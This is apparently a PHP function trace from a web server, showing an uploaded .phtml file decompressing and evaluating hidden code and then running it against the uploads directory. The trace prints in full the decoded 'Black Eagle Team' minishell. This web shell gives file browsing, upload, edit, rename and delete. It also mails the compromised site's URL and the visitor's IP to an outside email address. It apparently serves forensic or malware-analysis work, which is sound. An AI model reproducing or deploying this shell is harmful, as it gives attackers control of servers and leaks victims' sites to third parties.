3	12	R			'x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026'
3	13	0	0.001224	404024	gzuncompress	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026'
3	13	1	0.001320	407128
3	13	R			'x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026�\b��ޥdj�x'
3	14	0	0.001420	404024	gzuncompress	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026�\b��ޥdj�x'
3	14	1	0.001559	416344
3	14	R			'<?php\r\n/*\r\n    Black Eagle Team Shell v2\r\n    By : Bo0G3yM4n\r\n    Thanks To : Black Eagle Team, Dark Clown Security\r\n    Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v\r\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n$sname       = "Black Eagle Team" . " Minishell";\r\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\'
3	15	0	0.001874	471576	eval	1	'?><?php\r\n/*\r\n    Black Eagle Team Shell v2\r\n    By : Bo0G3yM4n\r\n    Thanks To : Black Eagle Team, Dark Clown Security\r\n    Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v\r\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n$sname       = "Black Eagle Team" . " Minishell";\r\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir     = "\\x72\\x6d\\x64" . "ir";\r\n$un__link    = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\nif (get_magic_quotes_gpc()) {\r\n    foreach ($_POST as $key => $value) {\r\n        $_POST[$key] = stripslashes($value);\r\n    }\r\n}\r\necho \'<!DOCTYPE html>\r\n<html>\r\n<head>\r\n<meta name="robots" content"noindex. nofollow">\r\n<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">\r\n<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">\r\n<title>\'.$sname.\'</title>\r\n<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\r\n<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body>\';\r\necho \'<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>\' . $sname . \'</center></h1></div>\';\r\nif (isset($_GET[\'path\'])) {\r\n    $path = $_GET[\'path\'];\r\n    chdir($_GET[\'path\']);\r\n} else {\r\n    $path = $__gcdir();\r\n}\r\n$path  = str_replace("\\\\", "/", $path);\r\n$paths = explode("/", $path);\r\necho \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';\r\necho "<font style=\'font-size:13px;\'>Path: ";\r\nforeach ($paths as $id => $pat) {\r\n    echo "<a style=\'font-size:13px;\' href=\'?path=";\r\n    for ($i = 0; $i <= $id; $i++) {\r\n        echo $paths[$i];\r\n        if ($i != $id) {\r\n            echo "/";\r\n        }\r\n    }\r\n    echo "\'>$pat</a>/";\r\n}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif (isset($_FILES[\'file\'])) {\r\n    if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . $_FILES[\'file\'][\'name\'])) {\r\n        echo \'<center><font color="#00ff00">Upload Berhasil!!</font></center><br/>\';\r\n    } else {\r\n        echo \'<center><font color="red">Upload Gagal!!</font></center><br/>\';\r\n    }\r\n}\r\necho \'</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">\';\r\necho \'\';\r\nif (isset($_GET[\'filesrc\'])) {\r\n    echo \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';\r\n    echo "" . basename($_GET[\'filesrc\']);\r\n    ""; \r\n    echo \'</tr></td></table><br />\';\r\n    echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");\r\n} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {\r\n    echo \'</table><br /><center>\' . $_POST[\'path\'] . \'<br /><br />\';\r\n    if ($_POST[\'opt\'] == \'rename\') {\r\n        if (isset($_POST[\'newname\'])) {\r\n            if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {\r\n                echo \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n            }\r\n            $_POST[\'name\'] = $_POST[\'newname\'];\r\n        }\r\n        echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>\';\r\n    } elseif ($_POST[\'opt\'] == \'edit\') {\r\n        if (isset($_POST[\'src\'])) {\r\n            $fp = fopen($_POST[\'path\'], \'w\');\r\n            if (fwrite($fp, $_POST[\'src\'])) {\r\n                echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';\r\n            }\r\n            fclose($fp);\r\n        }\r\n        echo \'<form method="POST"><textarea cols=80 rows=20 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>\';\r\n    }\r\n    echo \'</center>\';\r\n} else {\r\n    echo \'</table><br /><center>\';\r\n    if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {\r\n        if ($_POST[\'type\'] == \'dir\') {\r\n            if ($rm__dir($_POST[\'path\'])) {\r\n                echo \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';\r\n            }\r\n        } elseif ($_POST[\'type\'] == \'file\') {\r\n            if ($un__link($_POST[\'path\'])) {\r\n                echo \'<font color="#00ff00">Delete File Done.</font><br />\';\r\n            } else {\r\n                echo \'<font color="red">Delete File Error.</font><br />\';\r\n            }\r\n        }\r\n    }\r\n    echo \'</center>\';\r\n    $_scdir = $__scdir($path);\r\n    echo \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';\r\n    foreach ($_scdir as $dir) {\r\n        if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')\r\n            continue;\r\n        echo "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\n        if (is_writable("$path/$dir"))\r\n            echo \'<font color="#00ff00">\';\r\n        elseif (!is_readable("$path/$dir"))\r\n            echo \'<font color="red">\';\r\n        echo perms("$path/$dir");\r\n        if (is_writable("$path/$dir") || !is_readable("$path/$dir"))\r\n            echo \'</font>\';\r\n        echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";\r\n        echo "</center></td> <td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">&nbsp;<input type=\\"submit\\" value=\\">>\\" /></form></center></td></tr>";\r\n    }\r\n    foreach ($_scdir as $file) {\r\n        if (!is_file("$path/$file"))\r\n            continue;\r\n        $size = filesize("$path/$file") / 1024;\r\n        $size = round($size, 3);\r\n        if ($size >= 1024) {\r\n            $size = round($size / 1024, 2) . \' MB\';\r\n        } else {\r\n            $size = $size . \' KB\';\r\n        }\r\n        echo "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>" . $size . "</center></td><td><center>";\r\n        if (is_writable("$path/$file"))\r\n            echo \'<font color="#00ff00">\';\r\n        elseif (!is_readable("$path/$file"))\r\n            echo \'<font color="red">\';\r\n        echo perms("$path/$file");\r\n        if (is_writable("$path/$file") || !is_readable("$path/$file"))\r\n            echo \'</font>\';\r\n        echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";\r\n        echo "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">&nbsp;<input type=\\"submit\\" value=\\">>\\" /></form></center></td></tr>";\r\n    }\r\n    echo \'</table></div>\';\r\n}\r\nfunction perms($file)\r\n{\r\n    $perms = fileperms($file);\r\n    if (($perms & 0xC000) == 0xC000) {\r\n        $info = \'s\';\r\n    } elseif (($perms & 0xA000) == 0xA000) {\r\n        $info = \'l\';\r\n    } elseif (($perms & 0x8000) == 0x8000) {\r\n        $info = \'-\';\r\n    } elseif (($perms & 0x6000) == 0x6000) {\r\n        $info = \'b\';\r\n    } elseif (($perms & 0x4000) == 0x4000) {\r\n        $info = \'d\';\r\n    } elseif (($perms & 0x2000) == 0x2000) {\r\n        $info = \'c\';\r\n    } elseif (($perms & 0x1000) == 0x1000) {\r\n        $info = \'p\';\r\n    } else {\r\n        $info = \'u\';\r\n    }\r\n    $info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));\r\n    $info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));\r\n    $info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? \'T\' : \'-\'));\r\n    return $info;\r\n}\r\necho \'<br><center>&copy; <span id="footer"></span> 2020 Black Eagle Team</center><br>\';\r\necho \'</body></html><!-- EOF -->\';\r\n?>\r\n<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$to = \'alfredofernandezbutar@gmail.com\';\r\n$f31337 = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$fie = "Akses $f31337 :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>'	/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	0
4	16	0	0.002090	471576	set_time_limit	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	9	1	0
4	16	1	0.002109	471640
4	16	R			FALSE
4	17	0	0.002124	471608	error_reporting	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	10	1	0
4	17	1	0.002139	471648
4	17	R			22527
4	18	0	0.002153	471608	error_log	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	11	1	0
4	18	1	0.002182	471640
4	18	R			TRUE
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	12	$sname = 'Black Eagle Team Minishell'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	13	$__gcdir = 'getcwd'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	14	$__fgetcon7s = 'file_get_contents'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	15	$__scdir = 'scandir'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	16	$rm__dir = 'rmdir'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	17	$un__link = 'unlink'
4	19	0	0.002268	471608	get_magic_quotes_gpc	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	18	0
4	19	1	0.002282	471608
4	19	R			FALSE
4	20	0	0.002298	471608	getcwd	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	39	0
4	20	1	0.002313	471656
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	39	$path = '/var/www/html/uploads'
4	21	0	0.002340	471656	str_replace	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	41	3	'\\'	'/'	'/var/www/html/uploads'
4	21	1	0.002357	471752
4	21	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	41	$path = '/var/www/html/uploads'
4	22	0	0.002382	471656	explode	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	42	2	'/'	'/var/www/html/uploads'
4	22	1	0.002398	472232
4	22	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	42	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 1
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 2
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 3
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	45	$id = 4
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i = 0
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	47	$i++
4	23	0	0.002677	472160	scandir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	114	1	'/var/www/html/uploads'
4	23	1	0.002714	472784
4	23	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'userzero.phtml']
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	114	$_scdir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'userzero.phtml']
4	24	0	0.002755	472800	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/.'
4	24	1	0.002773	472864
4	24	R			TRUE
4	25	0	0.002788	472832	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/..'
4	25	1	0.002804	472880
4	25	R			TRUE
4	26	0	0.002818	472840	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/.htaccess'
4	26	1	0.002834	472880
4	26	R			FALSE
4	27	0	0.002847	472840	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/data'
4	27	1	0.002863	472880
4	27	R			TRUE
4	28	0	0.002877	472840	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	120	1	'/var/www/html/uploads/data'
4	28	1	0.002896	472880
4	28	R			TRUE
4	29	0	0.002910	472840	perms	1		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	124	1	'/var/www/html/uploads/data'
5	30	0	0.002924	472840	fileperms	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	1	'/var/www/html/uploads/data'
5	30	1	0.002939	472880
5	30	R			16895
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	$perms = 16895
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	165	$info = 'd'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	173	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	174	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	175	$info .= 'x'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	176	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	177	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	178	$info .= 'x'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	179	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	180	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	181	$info .= 'x'
4	29	1	0.003069	472880
4	29	R			'drwxrwxrwx'
4	31	0	0.003083	472840	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	125	1	'/var/www/html/uploads/data'
4	31	1	0.003100	472880
4	31	R			TRUE
4	32	0	0.003114	472840	filemtime	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	127	1	'/var/www/html/uploads/data'
4	32	1	0.003128	472880
4	32	R			1676258413
4	33	0	0.003141	472784	date	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	127	2	'd-M-Y H:i'	1676258413
4	33	1	0.003201	475176
4	33	R			'12-Feb-2023 22:20'
4	34	0	0.003220	474912	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/prepend.php'
4	34	1	0.003239	474960
4	34	R			FALSE
4	35	0	0.003252	474920	is_dir	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	117	1	'/var/www/html/uploads/userzero.phtml'
4	35	1	0.003267	474960
4	35	R			FALSE
4	36	0	0.003281	474904	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/.'
4	36	1	0.003297	474928
4	36	R			FALSE
4	37	0	0.003310	474896	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/..'
4	37	1	0.003326	474944
4	37	R			FALSE
4	38	0	0.003339	474904	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/.htaccess'
4	38	1	0.003355	474944
4	38	R			TRUE
4	39	0	0.003367	474904	filesize	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	1	'/var/www/html/uploads/.htaccess'
4	39	1	0.003381	474944
4	39	R			64
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	$size = 0.0625
4	40	0	0.003406	474848	round	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	2	0.0625	3
4	40	1	0.003426	474920
4	40	R			0.063
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	134	$size = 0.063
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	138	$size = '0.063 KB'
4	41	0	0.003465	474944	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	141	1	'/var/www/html/uploads/.htaccess'
4	41	1	0.003484	474984
4	41	R			FALSE
4	42	0	0.003496	474944	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	143	1	'/var/www/html/uploads/.htaccess'
4	42	1	0.003513	474984
4	42	R			TRUE
4	43	0	0.003526	474944	perms	1		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	145	1	'/var/www/html/uploads/.htaccess'
5	44	0	0.003540	474944	fileperms	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	1	'/var/www/html/uploads/.htaccess'
5	44	1	0.003554	474984
5	44	R			33188
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	155	$perms = 33188
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	161	$info = '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	173	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	174	$info .= 'w'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	175	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	176	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	177	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	178	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	179	$info .= 'r'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	180	$info .= '-'
4		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	181	$info .= '-'
4	43	1	0.003682	474984
4	43	R			'-rw-r--r--'
4	45	0	0.003696	474944	is_writable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/.htaccess'
4	45	1	0.003712	474984
4	45	R			FALSE
4	46	0	0.003725	474944	is_readable	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	146	1	'/var/www/html/uploads/.htaccess'
4	46	1	0.003742	474984
4	46	R			TRUE
4	47	0	0.003755	474944	filemtime	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	1	'/var/www/html/uploads/.htaccess'
4	47	1	0.003769	474984
4	47	R			1676258413
4	48	0	0.003783	474888	date	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	148	2	'd-M-Y H:i'	1676258413
4	48	1	0.003815	475216
4	48	R			'12-Feb-2023 22:20'
4	49	0	0.003831	474944	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/data'
4	49	1	0.003847	474984
4	49	R			FALSE
4	50	0	0.003860	474952	is_file	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	131	1	'/var/www/html/uploads/prepend.php'
4	50	1	0.003876	475000
4	50	R			TRUE
4	51	0	0.003889	474960	filesize	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	1	'/var/www/html/uploads/prepend.php'
4	51	1	0.003903	475000
4	51	R			57
3		A						/var/www/html/uploads/userzero.phtml(10) : eval()'d code(1) : eval()'d code	133	$size = 0.0556640625
